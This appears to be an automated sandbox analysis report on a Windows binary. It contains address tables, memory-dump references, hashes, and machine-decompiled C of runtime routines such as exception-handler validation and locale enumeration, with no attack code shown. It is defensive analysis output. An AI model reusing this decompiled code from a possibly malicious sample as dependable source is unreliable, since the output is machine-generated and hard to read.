0x0075b290
0x00000000
0x00000000
0x0075b296
0x0075b29a
0x0075b2f6
0x0075b2f8
0x0075b300
0x0075b302
0x0075b304
0x00000000
0x00000000
0x0075b306
0x0075b30c
0x0075b30e
0x0075b310
0x0075b325
0x0075b325
0x0075b327
0x0075b356
0x0075b35d
0x00000000
0x0075b35d
0x0075b32b
0x0075b32c
0x0075b32e
0x0075b330
0x0075b330
0x0075b332
0x0075b334
0x0075b336
0x0075b34a
0x0075b34a
0x0075b34d
0x0075b34f
0x0075b34f
0x0075b350
0x0075b350
0x00000000
0x0075b338
0x0075b338
0x0075b338
0x0075b341
0x0075b342
0x0075b344
0x0075b346
0x0075b346
0x00000000
0x0075b338
0x0075b336
0x0075b312
0x0075b319
0x0075b319
0x0075b31b
0x00000000
0x00000000
0x0075b31d
0x0075b31e
0x0075b321
0x0075b323
0x00000000
0x00000000
0x00000000
0x0075b323
0x00000000
0x0075b319
0x0075b29c
0x0075b29f
0x0075b2a4
0x00000000
0x00000000
0x0075b2ad
0x0075b2af
0x0075b2b5
0x00000000
0x00000000
0x0075b2bb
0x0075b2c1
0x00000000
0x00000000
0x0075b2c7
0x0075b2c9
0x0075b2d2
0x0075b2d6
0x00000000
0x00000000
0x0075b2dc
0x0075b2df
0x0075b2e1
0x00000000
0x00000000
0x0075b2e8
0x0075b2ea
0x00000000
0x00000000
0x0075b2ec
0x0075b2f0
0x00000000
0x00000000
0x00000000
0x0075b2f0
0x00000000
0x00000000
0x00000000
0x0075b1db
0x0075b1db
0x0075b1db
0x0075b1e2
0x00000000
0x00000000
0x0075b1e4
0x0075b1e5
0x0075b1e7
0x00000000
0x00000000
0x00000000
0x0075b1e7
0x0075b20f
0x0075b211
0x00000000
0x00000000
0x0075b221
0x0075b223
0x0075b225
0x00000000
0x00000000
0x0075b22b
0x0075b232
0x0075b25e
0x0075b25e
0x0075b260
0x0075b262
0x0075b276
0x0075b278
0x00000000
0x00000000
0x00000000
0x00000000
0x0075b264
0x0075b264
0x0075b264
0x0075b26d
0x0075b26e
0x0075b270
0x0075b272
0x0075b272
0x00000000
0x0075b264
0x0075b234
0x0075b234
0x0075b237
0x0075b239
0x0075b24b
0x0075b24b
0x0075b24e
0x0075b250
0x0075b250
0x0075b251
0x0075b251
0x0075b257
0x0075b257
0x00000000
0x00000000
0x00000000
0x00000000
0x0075b23b
0x0075b23b
0x0075b23b
0x0075b242
0x00000000
0x00000000
0x0075b244
0x0075b244
0x0075b245
0x00000000
0x00000000
0x00000000
0x0075b245
0x0075b247
0x0075b249
0x0075b25c
0x00000000
0x00000000
0x00000000
0x0075b25c
0x00000000
0x0075b249
0x0075b1bb
0x0075b1be
0x0075b1c1
0x00000000
0x00000000
0x0075b1c3
0x0075b1c5
0x00000000
0x00000000
0x00000000
0x0075b1c5
0x0075b18a
0x0075b18c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0075B1FA

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 543b6b1c1d8f5b58071f146e545c92f1bbecb1d3a1ac9edaec92f4fdd2fe021c
Instruction ID: a444de08844f57c7d1db3ec1faa8cbb8e1e0f10cf298f11a5139dee163c05b91
Opcode Fuzzy Hash: 543b6b1c1d8f5b58071f146e545c92f1bbecb1d3a1ac9edaec92f4fdd2fe021c
Instruction Fuzzy Hash: 3161C131A00746DBDB29CE29C8906F973A2FB85356F248178DC02DB1A1E7F9DC89C795

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE23D5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE23D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6ece41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6ece4240 = 1;
										__eflags =  *0x6ece4240;
										if( *0x6ece4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6ece41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6ece4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6ece41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6ece4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6ece41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6ece4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ece4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6ece4240 = 1;
							__eflags =  *0x6ece4240;
							if( *0x6ece4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6ece4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6ece4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6ece4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6ece4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6ece41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6ece4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ece4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6ece23df
0x6ece23e2
0x6ece23e8
0x6ece2406
0x00000000
0x6ece2406
0x6ece23f0
0x6ece23f9
0x6ece23ff
0x6ece240e
0x6ece2411
0x6ece2414
0x6ece241e
0x6ece241e
0x6ece2420
0x6ece2423
0x6ece2425
0x6ece2425
0x6ece2427
0x6ece242a
0x00000000
0x00000000
0x6ece242c
0x6ece242e
0x6ece2494
0x6ece2494
0x6ece25f2
0x00000000
0x6ece25f2
0x6ece2430
0x6ece2430
0x6ece2434
0x6ece2436
0x6ece2436
0x6ece2436
0x6ece2436
0x6ece2439
0x6ece243a
0x6ece243d
0x6ece243d
0x6ece2441
0x6ece2445
0x6ece2453
0x6ece2453
0x6ece245b
0x6ece2461
0x6ece2463
0x6ece2465
0x6ece2475
0x6ece2482
0x6ece2486
0x6ece248b
0x6ece248d
0x6ece250b
0x6ece250b
0x6ece248f
0x6ece248f
0x6ece248f
0x6ece250d
0x6ece250f
0x6ece25f0
0x6ece25f0
0x00000000
0x6ece2515
0x6ece2515
0x6ece251c
0x00000000
0x00000000
0x6ece2522
0x6ece2526
0x6ece2582
0x6ece2584
0x6ece258c
0x6ece258e
0x6ece2590
0x00000000
0x00000000
0x6ece2592
0x6ece2598
0x6ece259a
0x6ece259c
0x6ece25b1
0x6ece25b1
0x6ece25b3
0x6ece25e2
0x6ece25e9
0x00000000
0x6ece25e9
0x6ece25b7
0x6ece25b8
0x6ece25ba
0x6ece25bc
0x6ece25bc
0x6ece25be
0x6ece25c0
0x6ece25c2
0x6ece25d6
0x6ece25d6
0x6ece25d9
0x6ece25db
0x6ece25db
0x6ece25dc
0x6ece25dc
0x00000000
0x6ece25c4
0x6ece25c4
0x6ece25c4
0x6ece25cd
0x6ece25ce
0x6ece25d0
0x6ece25d2
0x6ece25d2
0x00000000
0x6ece25c4
0x6ece25c2
0x6ece259e
0x6ece25a5
0x6ece25a5
0x6ece25a7
0x00000000
0x00000000
0x6ece25a9
0x6ece25aa
0x6ece25ad
0x6ece25af
0x00000000
0x00000000
0x00000000
0x6ece25af
0x00000000
0x6ece25a5
0x6ece2528
0x6ece252b
0x6ece2530
0x00000000
0x00000000
0x6ece2539
0x6ece253b
0x6ece2541
0x00000000
0x00000000
0x6ece2547
0x6ece254d
0x00000000
0x00000000
0x6ece2553
0x6ece2555
0x6ece255e
0x6ece2562
0x00000000
0x00000000
0x6ece2568
0x6ece256b
0x6ece256d
0x00000000
0x00000000
0x6ece2574
0x6ece2576
0x00000000
0x00000000
0x6ece2578
0x6ece257c
0x00000000
0x00000000
0x00000000
0x6ece257c
0x00000000
0x00000000
0x00000000
0x6ece2467
0x6ece2467
0x6ece2467
0x6ece246e
0x00000000
0x00000000
0x6ece2470
0x6ece2471
0x6ece2473
0x00000000
0x00000000
0x00000000
0x6ece2473
0x6ece249b
0x6ece249d
0x00000000
0x00000000
0x6ece24ad
0x6ece24af
0x6ece24b1
0x00000000
0x00000000
0x6ece24b7
0x6ece24be
0x6ece24ea
0x6ece24ea
0x6ece24ec
0x6ece24ee
0x6ece2502
0x6ece2504
0x00000000
0x00000000
0x00000000
0x00000000
0x6ece24f0
0x6ece24f0
0x6ece24f0
0x6ece24f9
0x6ece24fa
0x6ece24fc
0x6ece24fe
0x6ece24fe
0x00000000
0x6ece24f0
0x6ece24c0
0x6ece24c3
0x6ece24c5
0x6ece24d7
0x6ece24d7
0x6ece24da
0x6ece24dc
0x6ece24dc
0x6ece24dd
0x6ece24dd
0x6ece24e3
0x00000000
0x00000000
0x00000000
0x00000000
0x6ece24c7
0x6ece24c7
0x6ece24c7
0x6ece24ce
0x00000000
0x00000000
0x6ece24d0
0x6ece24d0
0x6ece24d1
0x00000000
0x00000000
0x00000000
0x6ece24d1
0x6ece24d3
0x6ece24d5
0x6ece24e8
0x00000000
0x00000000
0x00000000
0x6ece24e8
0x00000000
0x6ece24d5
0x6ece2447
0x6ece244a
0x6ece244d
0x00000000
0x00000000
0x6ece244f
0x6ece2451
0x00000000
0x00000000
0x00000000
0x6ece2451
0x6ece2416
0x6ece2418
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6ECE2486

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: c1b5c928b637b075bd1ad44d8cacc98d449ee5cea46cb2056866e3c3598b8a0d
Instruction ID: 0dae64795f345c5a7fc6e328e9d6be0d31d6fb829ef50deb8682e973c98ac4cc
Opcode Fuzzy Hash: c1b5c928b637b075bd1ad44d8cacc98d449ee5cea46cb2056866e3c3598b8a0d
Instruction Fuzzy Hash: A261C031615703CFEB5DCFA9DAB0B5973B5FB85314B248429DC26CBA88F770D8828650

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E3AD, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

EnumSystemLocalesW.KERNEL32(6ED4E4D3,00000001,00000000,?,-00000050,?,6ED4EB01,00000000,?,?,?,00000055,?), ref: 6ED4E41F

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bf7b46f1058f94b65251f221099466d9baf2d4928ede8e170854dc6a82a92a19
Instruction ID: 4984e908e9fe4e9aa683b6783424db961c7f8fee7b809d49fe794d9abb47c458
Opcode Fuzzy Hash: bf7b46f1058f94b65251f221099466d9baf2d4928ede8e170854dc6a82a92a19
Instruction Fuzzy Hash: C011293B604705EFDB18DFB9C8946BAB7A2FF80329B14482DED468BA40D371E502CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E448, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

EnumSystemLocalesW.KERNEL32(6ED4E726,00000001,00000000,?,-00000050,?,6ED4EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6ED4E492

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5b770c9604ec9d1b8e11f2ffec9b5b6ce2f121eb021c7efb576c9ca78579ddcb
Instruction ID: 2ab914c9ffdc31c7d12ea45c97811c488e4a8fcc513f85a41fea5bea445a29b2
Opcode Fuzzy Hash: 5b770c9604ec9d1b8e11f2ffec9b5b6ce2f121eb021c7efb576c9ca78579ddcb
Instruction Fuzzy Hash: 76F09C36204308EFD7249FBAD88466A7B95FF91378F15882DED454F640D771D841D750

Uniqueness

Uniqueness Score: -1.00%

Function 6ED40429, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 6ED2843F: RtlEnterCriticalSection.NTDLL(?), ref: 6ED2844E

EnumSystemLocalesW.KERNEL32(6ED4041C,00000001,6ED88410,0000000C,6ED40CBD,00000000), ref: 6ED40461

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: cd094c927b0fc33d8c684fdb1384fc409af94942050a72c4c0c3408c88ff03a9
Instruction ID: 9471251ff1203a97653ead395f67e664196cd5024cd206b33b51a8623d1978e5
Opcode Fuzzy Hash: cd094c927b0fc33d8c684fdb1384fc409af94942050a72c4c0c3408c88ff03a9
Instruction Fuzzy Hash: 12F04476A10608DFEB00DFE8E801B9D7BF1FB1A329F10862AF5249B390DB7549058F61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E344, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

EnumSystemLocalesW.KERNEL32(6ED4E29D,00000001,00000000,?,?,6ED4EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6ED4E37B

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c3f9099e4a19deabe759d44079755d93d581a72c946e42a8b76d3b760ab5ceb9
Instruction ID: 4c19af69d8ca14033acb99c4596caa797f0a10efa3158c86be6c82b0a65149fc
Opcode Fuzzy Hash: c3f9099e4a19deabe759d44079755d93d581a72c946e42a8b76d3b760ab5ceb9
Instruction Fuzzy Hash: 71F0553A300205E7DB04DFBAC8486AABFA4EFC2321B0A4059EE058F240C231D843C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED40E4C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6ED433BC,?,20001004,00000000,00000002,?,?,6ED4271D), ref: 6ED40E80

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 50c63012c0c32f306b3b99cb671a09a8c0f86cff603499b9b8cc02998033bf84
Instruction ID: a1df08635f646c8b70a5dda2eb31284723c862a14e023d50ebbc206a43240c7f
Opcode Fuzzy Hash: 50c63012c0c32f306b3b99cb671a09a8c0f86cff603499b9b8cc02998033bf84
Instruction Fuzzy Hash: 9FE04F32500518FBCF122FA1DC04EDE3F19EF657A1F004420FC1566190DB718931AAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED19EB5, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6ED1981B,?,00000022,00000000,00000002,?,?,6ED16C7B,00000000,?), ref: 6ED19EE2

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cf582944c42335990ddea5682d0a640825b55824f0238f64dab76b2cd49857a7
Instruction ID: 0b344c2f1a65f9ae859b217507dae3b6426b477465ee89772fa0f2f66ab3d838
Opcode Fuzzy Hash: cf582944c42335990ddea5682d0a640825b55824f0238f64dab76b2cd49857a7
Instruction Fuzzy Hash: 22E0C232509929EFCF025FD1EC08CEE3F29EF067217088404FD1416154CB329C219BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3A2B1, Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
Instruction ID: 184ea9036225e2cee9d701904cafc67d6a175b7d888fccca8c496bb45d6b3db2
Opcode Fuzzy Hash: a043ccc47e3fde7a2226f1987a1f6f30a92165c30642a1e99a24607af7041dd9
Instruction Fuzzy Hash: C032B374A1022ADFCF14CF98C990AEEB7B5EF46304F244169DC85AB359D731E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2B597, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
Instruction ID: 48fcded5bcffcef3f87eb437c1530452806d8c5c4d30a2acc77df12aafbeb006
Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
Instruction Fuzzy Hash: 7051A471E00219EFDF04CF99C950AEEBBB2FF88304F188069E515AB245C774DA51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0075AF24, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E0075AF24(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0075B08F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E0075B149(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E0075B034(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0075B08F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E0075B12B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x0075af28
0x0075af29
0x0075af2a
0x0075af2d
0x0075af2f
0x0075af32
0x0075af33
0x0075af35
0x0075af36
0x0075af37
0x0075af3a
0x0075af44
0x0075aff5
0x0075affc
0x0075b005
0x0075af4a
0x0075af4a
0x0075af50
0x0075af56
0x0075af59
0x0075af5c
0x0075af60
0x0075af65
0x0075af6a
0x0075afea
0x00000000
0x0075af6c
0x0075af6c
0x0075af78
0x0075af7a
0x0075afd5
0x0075afd5
0x0075afdb
0x00000000
0x0075af7c
0x0075af8b
0x0075af8d
0x0075af8e
0x0075af8f
0x0075af92
0x0075af92
0x0075af94
0x00000000
0x0075af96
0x0075af96
0x0075afe0
0x0075af98
0x0075af98
0x0075af9c
0x0075afa4
0x0075afa9
0x0075afae
0x0075afba
0x0075afc2
0x0075afc9
0x0075afcf
0x0075afd3
0x00000000
0x0075afd3
0x0075af96
0x0075af94
0x00000000
0x0075af7a
0x0075afee
0x0075afee
0x0075afee
0x0075af6a
0x0075b00a
0x0075b011

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: b82512bd36df052a04460c5b3e3318c1171ee1dbde9f5f4083692d8714c0ebff
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 9921A772900204AFCB14DF68C8C49ABB7A5FF44350B058168ED558B285D774F919C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE21B4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6ECE21B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
